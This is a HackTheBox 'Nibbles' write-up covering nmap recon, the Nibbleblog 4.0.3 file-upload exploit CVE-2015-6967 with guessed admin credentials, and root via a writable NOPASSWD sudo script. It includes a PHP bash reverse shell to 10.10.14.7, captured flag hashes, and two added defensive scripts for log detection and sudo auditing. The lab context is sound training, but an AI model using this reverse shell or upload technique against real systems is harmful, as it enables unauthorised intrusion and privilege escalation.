
HackTheBox - Nibbles

Foothold

I have a paid account at Hack The Box and I feel I should use it more than I do. When I'm not working on their CTF-style boxes, I like some challenges. The thing is that with the boxes, I usually don't write them up. While I hone my skills in the hacking part, I don't hone them in documenting the process. When I post here I may miss a thing or two, but I try to do it, because documentation is as important as the actual exploitation process. Something to keep in mind if you solve these boxes for more than your entertainment.

nibbles

With Nibbles, nothing is really new except for two things. First, I have to work on another content management system. Second, I learned something about hash cracking – but I’ll get to that in a moment.

Reconnaissance

First things first, we run a quick initial nmap scan to see which ports are open and which services are running on those ports.

nmap scan (open ports)

$ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Nibbles-full-port-scan.txt 10.10.10.75
Warning: 10.10.10.75 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.75
Host is up (0.096s latency).
Not shown: 65508 closed ports
PORT      STATE    SERVICE    VERSION
22/tcp    open     ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp    open     http       Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
4418/tcp  filtered axysbridge

Apache/2.4.18 (port 80)

By inspecting the sources on port 80, we see there is a hidden directory /nibbleblog/:

view-source-hidden-dir

Once we go to this “hidden” directory, we see that it is a website powered by Nibbleblog, which turns out to be an open source CMS for blogs:

nibbleblog

While I was navigating on the website, I encountered the following error:

XML error

Maybe there is something to do with it, but let’s continue our enumeration.

Nibbleblog

Since I’m looking for more information, I ran dirb on http://10.10.10.75/nibbleblog/:

dirb

On http://10.10.10.75/nibbleblog/README, we get the version number (v4.0.3) of Nibbleblog:

version

Bibbidi-Bobbidi-Boo…there is an exploit available!

searchsploit

But it requires credentials so we have to go further:

exploit-options

Credentials

I made a quick search → “nibbleblog default credentials”. Unfortunately, I didn’t find anything.

Nevertheless, there is an admin’s page: http://10.10.10.75/nibbleblog/admin.php. We can try some basic username/password combinations like admin/admin, root/root or even nibbles/nibbles.

admin/nibbles worked:

success

Metasploit

Let’s go back to the exploit:

msf

By doing so, we have a meterpreter. That’s nice, but in order to avoid this “black box” method, let’s exploit the vulnerability without this tool.

CVE-2015-6967 exploitation

Thanks to https://packetstormsecurity.com/files/133425/NibbleBlog-4.0.3-Shell-Upload.html, we can follow the steps to perform the exploit:

packetstorm

  1. Prepare our PHP reverse shell:

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.7/1234 0>&1'");

  2. Upload our malicious file to http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image:

plugins > my image

  3. Run a listener → nc -lnvp 1234

  4. Visit http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php. Now we have a shell:

shell
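From the defender's side, the same steps leave a distinctive trace in the web server log. As an added example (not from the original post), the script below runs a detection pass over constructed Apache access-log lines in combined log format; it assumes the default Nibbleblog paths seen above and flags a client that submitted the my_image plugin form and then requested a .php file from that plugin's upload directory, where only image files belong.

```shell
#!/usr/bin/env bash
# Added detection helper (not from the original post). It scans Apache access
# log lines for the CVE-2015-6967 pattern used above: a client posts to the
# my_image plugin config page (the upload form) and then requests a .php file
# inside that plugin's upload directory, where only image files belong.

# Constructed sample in Apache combined log format (not captured from the box).
SAMPLE_ACCESS_LOG='10.10.14.7 - - [23/Dec/2017:15:10:01 +0000] "GET /nibbleblog/admin.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.10.14.7 - - [23/Dec/2017:15:10:42 +0000] "POST /nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image HTTP/1.1" 302 312 "-" "Mozilla/5.0"
10.10.14.7 - - [23/Dec/2017:15:11:05 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.10.1 - - [23/Dec/2017:15:12:00 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'

# Field layout of the combined format: $1 client IP, $6 "METHOD, $7 path.
# Print "ip path" for every request to a .php file under a plugin upload dir.
find_php_in_plugin_uploads() {
  awk '$7 ~ /^\/nibbleblog\/content\/private\/plugins\/.*\.php$/ { print $1, $7 }'
}

# Print each client IP that submitted the my_image plugin config form.
find_my_image_config_posts() {
  awk '$6 == "\"POST" && $7 ~ /admin\.php\?.*plugin=my_image/ { print $1 }' | sort -u
}

# Correlate both signals per client: one ALERT line for each IP that posted to
# the plugin form and also fetched a .php file from the plugin directory.
correlate_upload_then_exec() {
  log="$1"
  for ip in $(printf '%s\n' "$log" | find_my_image_config_posts); do
    printf '%s\n' "$log" | find_php_in_plugin_uploads |
      awk -v ip="$ip" '$1 == ip { print "ALERT", $1, $2 }'
  done
}

correlate_upload_then_exec "$SAMPLE_ACCESS_LOG"
```

Point the functions at a real log with `correlate_upload_then_exec "$(cat /var/log/apache2/access.log)"`; the image.jpg request from the second client is correctly left alone.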

User (nibbler)

nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home
nibbler@Nibbles:/home$ ls
ls
nibbler
nibbler@Nibbles:/home$ cd nibbler
cd nibbler
nibbler@Nibbles:/home/nibbler$ ls -la
ls -la
total 20
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29  2017 .
drwxr-xr-x 3 root    root    4096 Dec 10  2017 ..
-rw------- 1 nibbler nibbler    0 Dec 29  2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10  2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10  2017 personal.zip
-r-------- 1 nibbler nibbler   33 Dec 23 15:17 user.txt
nibbler@Nibbles:/home/nibbler$ cat user.txt
cat user.txt
e598bb90bc9ff2f87b72e2083c1cb95a
nibbler@Nibbles:/home/nibbler$

Let’s see what we can run with sudo:

$ sudo -l 
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

Root

Okay, so we just have to replace /home/nibbler/personal/stuff/monitor.sh with malicious content:

nibbler@Nibbles:/home/nibbler$ mkdir -p personal/stuff
nibbler@Nibbles:/home/nibbler$ echo "cat /root/root.txt" > /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ sudo /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
b59ce6c276598083872b41d4785c3e8
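The root cause here is a NOPASSWD rule pointing at a script under the user's own home directory, which did not even exist yet, so the user could simply create it. As an added example (not from the original post), the audit helper below reads `sudo -l` output and classifies each NOPASSWD target by whether the calling user could modify or create it; the `sudo -l` text embedded in it is a constructed sample reproducing the rule found on Nibbles.

```shell
#!/usr/bin/env bash
# Added audit helper (not from the original post): reads `sudo -l` output and,
# for each NOPASSWD command, reports whether the calling user could swap its
# body. On Nibbles the target did not exist yet, but its ancestor /home/nibbler
# was writable by nibbler, so the user could simply create the script.

# Deepest existing ancestor of $1 (the path itself when it exists).
existing_ancestor() {
  p="$1"
  while [ ! -e "$p" ] && [ "$p" != "/" ]; do
    p=$(dirname "$p")
  done
  printf '%s\n' "$p"
}

# Verdict for one command path, evaluated with the current user's permissions:
#   WRITABLE           existing file the user can modify
#   MISSING-CREATABLE  file absent, but the user can create it (Nibbles case)
#   OK                 neither condition holds
classify_target() {
  target="$1"
  if [ -e "$target" ]; then
    [ -w "$target" ] && echo "WRITABLE" || echo "OK"
  else
    [ -w "$(existing_ancestor "$target")" ] && echo "MISSING-CREATABLE" || echo "OK"
  fi
}

# Pull every NOPASSWD command path out of `sudo -l` text on stdin, one per line
# (a rule may list several comma-separated commands).
extract_nopasswd_targets() {
  sed -n 's/.*NOPASSWD: *//p' | tr ',' '\n' | awk 'NF { print $1 }'
}

# Full pass: one "VERDICT path" line per NOPASSWD rule found on stdin.
audit_sudo_output() {
  extract_nopasswd_targets | while IFS= read -r t; do
    printf '%s %s\n' "$(classify_target "$t")" "$t"
  done
}

# Constructed sample: the rule the post found on Nibbles.
SAMPLE_SUDO_L='User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh'

printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_output
```

Run `sudo -l | audit_sudo_output` as the account being reviewed; any verdict other than OK means the rule grants root to whoever controls that path, and the fix is to point the rule at a root-owned, non-writable location.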

This post is licensed under 0x3n0 by the author.
